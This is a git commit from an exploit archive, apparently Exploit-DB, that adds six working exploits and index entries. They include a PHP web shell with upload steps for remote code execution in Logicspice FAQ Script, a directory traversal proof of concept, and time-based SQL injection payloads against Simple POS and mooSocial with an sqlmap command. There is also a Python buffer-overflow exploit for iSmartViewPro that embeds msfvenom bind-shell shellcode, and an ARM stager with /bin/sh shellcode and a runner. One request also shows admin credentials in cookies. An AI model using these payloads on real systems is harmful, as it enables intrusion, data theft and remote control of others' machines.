DB: 2018-09-05
6 changes to exploits/shellcodes iSmartViewPro 1.5 - 'DDNS' Buffer Overflow Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection mooSocial Store Plugin 2.6 - SQL Injection Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)
This commit is contained in:
parent
925b2171f4
commit
14bdc56535
8 changed files with 338 additions and 0 deletions
56
exploits/php/webapps/45326.txt
Normal file
56
exploits/php/webapps/45326.txt
Normal file
|
@ -0,0 +1,56 @@
|
||||||
|
# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
|
||||||
|
# Dork: N/A
|
||||||
|
# Date: 2018-09-03
|
||||||
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
||||||
|
# Vendor Homepage: https://www.logicspice.com/products/faq-script
|
||||||
|
# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
|
||||||
|
# Version: 2.9.7
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Kali linux
|
||||||
|
|
||||||
|
# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which
|
||||||
|
# leads to a remote command execution on the remote server.
|
||||||
|
|
||||||
|
# 1) Create a file with the below PHP code and save it as .php
|
||||||
|
|
||||||
|
<?php $cmd=$_GET['cmd']; system($cmd); ?>
|
||||||
|
|
||||||
|
# 2) Login to FAQ Script admin portal as priviliage user
|
||||||
|
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
|
||||||
|
# 4) Click at the Actions button of a current FAQ product --> Edit
|
||||||
|
# 5) Click (Image) button on Content panel.
|
||||||
|
# 6) Chose Upload section and browse your .php file.
|
||||||
|
# 7) Finaly click "Send it to Server". Script will give you a link belong to
|
||||||
|
# our php file.
|
||||||
|
# 8) verift the exploit:
|
||||||
|
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id
|
||||||
|
|
||||||
|
# The request:
|
||||||
|
|
||||||
|
POST
|
||||||
|
/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
|
||||||
|
HTTP/1.1
|
||||||
|
Host: faq-script.logicspice.com
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
|
||||||
|
Firefox/52.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer:
|
||||||
|
http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter
|
||||||
|
Cookie: __asc=3c88bfff1659e6148e6168c52d2;
|
||||||
|
__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
|
||||||
|
_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
|
||||||
|
admin_username=logicspice; admin_password=faqscript_admin;
|
||||||
|
CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
|
||||||
|
Connection: keep-alive
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: multipart/form-data;
|
||||||
|
boundary=---------------------------1036720403269880351068202740
|
||||||
|
Content-Length: 267
|
||||||
|
-----------------------------1036720403269880351068202740
|
||||||
|
Content-Disposition: form-data; name="upload"; filename="shell.php"
|
||||||
|
Content-Type: application/x-php
|
||||||
|
|
||||||
|
<?php $cmd=$_GET['cmd']; system($cmd); ?>
|
||||||
|
-----------------------------1036720403269880351068202740--
|
34
exploits/php/webapps/45327.txt
Normal file
34
exploits/php/webapps/45327.txt
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
# Exploit Title: PHP File Browser Script 1 - Directory Traversal
|
||||||
|
# Dork: N/A
|
||||||
|
# Date: 2018-09-03
|
||||||
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
||||||
|
# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
|
||||||
|
# Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Kali linux
|
||||||
|
# Description : The "index.php" is vulnerable to directory traversal.
|
||||||
|
# An attacker can see and read all files known by the name
|
||||||
|
|
||||||
|
# Vulnerable File: index.php
|
||||||
|
<?php // line 45
|
||||||
|
|
||||||
|
72 $script = basename(__FILE__); // the name of this script
|
||||||
|
73 $path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access
|
||||||
|
74
|
||||||
|
75 if($loc!=''){
|
||||||
|
76 echo "<p id='bloc'><b>Browsing Location: </b><a href='index.php'><b>".ucfirst($loc1)."</b></a>
|
||||||
|
77 <a href='$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>
|
||||||
|
78 <a href=''><b>".ucfirst($locdem3)."</b></a></p>";}
|
||||||
|
79 else{
|
||||||
|
80 echo "<p id='bloc'><b>Browsing Location: </b><a href=''><b>Demo</b></a></p>";
|
||||||
|
|
||||||
|
?> // line 151
|
||||||
|
|
||||||
|
# PoC :
|
||||||
|
|
||||||
|
https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]
|
||||||
|
|
||||||
|
# You can write the known directory name instead of [DirectoryName].
|
||||||
|
# Example: '/etc/' or '/var/www/'
|
||||||
|
# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/
|
45
exploits/php/webapps/45328.txt
Normal file
45
exploits/php/webapps/45328.txt
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
# Exploit Title: Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2018-08-31
|
||||||
|
# Exploit Author: Renos Nikolaou
|
||||||
|
# Software Link: https://codecanyon.net/item/simple-pos-point-of-sale-made-easy/3947976
|
||||||
|
# Vendor Homepage: https://tecdiary.com/
|
||||||
|
# Version: 4.0.24
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE: N/A
|
||||||
|
# Description : The vulnerability allows an attacker to inject sql commands on 'columns[0][search][value]' parameters in the management panel.
|
||||||
|
|
||||||
|
# PoC:
|
||||||
|
|
||||||
|
http://domain.com/spos/products
|
||||||
|
|
||||||
|
POST /spos/products/get_products/1 HTTP/1.1
|
||||||
|
Host: domain.com
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Referer: http://domain.com/spos/products
|
||||||
|
Content-Length: 2085
|
||||||
|
Cookie: spos_spos_cookie=ab62f546025dd1a7d652ba75d13b87dc; spos_session=049soe8cr49aq318q7qhqlic6kpdgdee
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
|
||||||
|
|
||||||
|
|
||||||
|
# SQLMap Result:
|
||||||
|
# SQLmap command: ./sqlmap.py -r spos.txt --dbms=mysql -v4 -p 'columns[0][search][value]' --banner --level 5 --risk 3 --tamper=space2comment --random-agent
|
||||||
|
|
||||||
|
Parameter: columns[0][search][value] (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||||
|
Payload: draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
|
||||||
|
|
||||||
|
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
|
||||||
|
---
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: PHP 7.1.16, Apache 2.4.33
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
banner: '10.1.31-MariaDB'
|
44
exploits/php/webapps/45330.txt
Normal file
44
exploits/php/webapps/45330.txt
Normal file
|
@ -0,0 +1,44 @@
|
||||||
|
# Exploit Title: mooSocial Store Plugin 2.6 - SQL Injection
|
||||||
|
# Exploit Author: Andrea Bocchetti
|
||||||
|
# Date: 2018-08-28
|
||||||
|
# Google Dork: N/A -
|
||||||
|
# Vendor: https://moosocial.com/product/store-plugins/
|
||||||
|
# Software Link: https://moosocial.com/product/store-plugins/
|
||||||
|
# Demo URL: http://addons.moosocial.com/stores
|
||||||
|
# Purchase link: https://moosocial.com/addons/
|
||||||
|
# Affected Version: all versions
|
||||||
|
# Patched Version: 2.7
|
||||||
|
# Category: Web Application
|
||||||
|
# Platform: PHP
|
||||||
|
# Tested on: Ubuntu
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
# 1. Technical Description:
|
||||||
|
# mooSocial Store Plugin is affected by Blind SQL Injection in the product parameter used with URL Rewrite
|
||||||
|
|
||||||
|
GET /stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 HTTP/1.1
|
||||||
|
Host: addons.moosocial.com
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: CAKEPHP=2b0v0a2360nhl46psmm1mejsi7
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
|
||||||
|
# 3. Payload:
|
||||||
|
|
||||||
|
# Parameter: #1* (URI)
|
||||||
|
# Type: boolean-based blind
|
||||||
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
|
||||||
|
Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND 5011=5011
|
||||||
|
|
||||||
|
# Type: stacked queries
|
||||||
|
# Title: MySQL > 5.0.11 stacked queries (comment)
|
||||||
|
# Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65;SELECT SLEEP(5)#
|
||||||
|
# Type: AND/OR time-based blind
|
||||||
|
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||||
|
|
||||||
|
Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND SLEEP(5)
|
57
exploits/windows_x86/local/45325.py
Executable file
57
exploits/windows_x86/local/45325.py
Executable file
|
@ -0,0 +1,57 @@
|
||||||
|
# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
|
||||||
|
# Discovery by: Luis Martinez
|
||||||
|
# Discovery Date: 2018-09-03
|
||||||
|
# Vendor Homepage: https://securimport.com/
|
||||||
|
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
|
||||||
|
# Tested Version: 1.5
|
||||||
|
# Vulnerability Type: Buffer Overflow
|
||||||
|
# Tested on OS: Windows XP Professional SP3 x86 es
|
||||||
|
|
||||||
|
# Steps to Produce the Buffer Overflow:
|
||||||
|
# 1.- Run python code : iSmartViewPro_1.5.py
|
||||||
|
# 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard
|
||||||
|
# 3.- Open iSmartViewPro
|
||||||
|
# 4.- Add Device
|
||||||
|
# 5.- Add device manually
|
||||||
|
# 6.- Device alias -> test
|
||||||
|
# 7.- Paste ClipBoard on "DDNS/IP/DID"
|
||||||
|
# 8.- Account -> admin
|
||||||
|
# 9.- Password -> admin
|
||||||
|
# 10.- Save
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
#7E6B30D7 FFE4 JMP ESP SHELL32.dll
|
||||||
|
ret = "\xD7\x30\x6B\x7E"
|
||||||
|
|
||||||
|
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
|
||||||
|
shellcode = (
|
||||||
|
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
|
||||||
|
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
|
||||||
|
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
|
||||||
|
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
|
||||||
|
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
|
||||||
|
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
|
||||||
|
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
|
||||||
|
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
|
||||||
|
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
|
||||||
|
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
|
||||||
|
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
|
||||||
|
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
|
||||||
|
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
|
||||||
|
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
|
||||||
|
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
|
||||||
|
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
|
||||||
|
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
|
||||||
|
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
|
||||||
|
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
|
||||||
|
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
|
||||||
|
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
|
||||||
|
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
|
||||||
|
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
|
||||||
|
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
|
||||||
|
|
||||||
|
buffer = "\x41" * 383 + ret + "\x90" * 8 + shellcode
|
||||||
|
f = open ("iSmartViewPro_1.5.txt", "w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
|
@ -9936,6 +9936,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
|
45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
|
||||||
45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
|
45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
|
||||||
45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
|
45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
|
||||||
|
45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -39917,3 +39918,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
|
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
|
||||||
45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
|
45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
|
||||||
45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
|
45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
|
||||||
|
45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,
|
||||||
|
45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,
|
||||||
|
45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php,
|
||||||
|
45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -907,3 +907,4 @@ id,file,description,date,author,type,platform
|
||||||
45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
|
45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
|
||||||
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
|
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
|
||||||
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
|
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
|
||||||
|
45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
|
||||||
|
|
|
96
shellcodes/arm/45329.c
Normal file
96
shellcodes/arm/45329.c
Normal file
|
@ -0,0 +1,96 @@
|
||||||
|
/*
|
||||||
|
# Title: Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
|
||||||
|
# Date: 2018-08-31
|
||||||
|
# Tested: armv7l (Raspberry Pi 3 Model B+)
|
||||||
|
# Author: Ken Kitahara
|
||||||
|
|
||||||
|
[System Information]
|
||||||
|
pi@raspberrypi:~ $ uname -a
|
||||||
|
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
|
||||||
|
pi@raspberrypi:~ $ lsb_release -a
|
||||||
|
No LSB modules are available.
|
||||||
|
Distributor ID: Raspbian
|
||||||
|
Description: Raspbian GNU/Linux 9.4 (stretch)
|
||||||
|
Release: 9.4
|
||||||
|
Codename: stretch
|
||||||
|
pi@raspberrypi:~ $
|
||||||
|
|
||||||
|
[Procedure]
|
||||||
|
(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode (20 Bytes).
|
||||||
|
|
||||||
|
pi@raspberrypi:~ $ cat binsh.s
|
||||||
|
.section .text
|
||||||
|
.global _start
|
||||||
|
|
||||||
|
_start:
|
||||||
|
.THUMB
|
||||||
|
// execve("/bin/sh", NULL, NULL)
|
||||||
|
adr r0, spawn
|
||||||
|
eor r1, r1, r1
|
||||||
|
eor r2, r2, r2
|
||||||
|
strb r2, [r0, #7]
|
||||||
|
mov r7, #0xb
|
||||||
|
svc #1
|
||||||
|
|
||||||
|
spawn:
|
||||||
|
.ascii "/bin/shX"
|
||||||
|
pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
|
||||||
|
pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
|
||||||
|
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin && echo
|
||||||
|
\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
|
||||||
|
pi@raspberrypi:~ $
|
||||||
|
|
||||||
|
|
||||||
|
(2) Create stager shellcode (20 Bytes).
|
||||||
|
|
||||||
|
pi@raspberrypi:~ $ cat stager.s
|
||||||
|
.section .text
|
||||||
|
.global _start
|
||||||
|
|
||||||
|
_start:
|
||||||
|
.ARM
|
||||||
|
add lr, pc, #1
|
||||||
|
bx lr
|
||||||
|
|
||||||
|
.THUMB
|
||||||
|
// read(0, buf, 0xff)
|
||||||
|
eor r0, r0, r0
|
||||||
|
adr r1, loadpoint
|
||||||
|
mov r2, #0xff
|
||||||
|
mov r7, #3
|
||||||
|
svc #1
|
||||||
|
mov pc, r1
|
||||||
|
loadpoint:
|
||||||
|
pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
|
||||||
|
pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
|
||||||
|
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
|
||||||
|
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x02\xa1\xff\x22\x03\x27\x01\xdf\x8f\x46
|
||||||
|
pi@raspberrypi:~ $
|
||||||
|
|
||||||
|
(3) Operation test.
|
||||||
|
|
||||||
|
pi@raspberrypi:~ $ (echo -ne "\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
|
||||||
|
id
|
||||||
|
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
|
||||||
|
exit
|
||||||
|
^C
|
||||||
|
pi@raspberrypi:~ $
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include<stdio.h>
|
||||||
|
#include<string.h>
|
||||||
|
|
||||||
|
unsigned char sc[] = \
|
||||||
|
"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
|
||||||
|
"\x40\x40\x02\xa1\xff\x22\x03\x27"
|
||||||
|
"\x01\xdf\x8f\x46";
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n", strlen(sc));
|
||||||
|
|
||||||
|
int (*ret)() = (int(*)())sc;
|
||||||
|
|
||||||
|
ret();
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue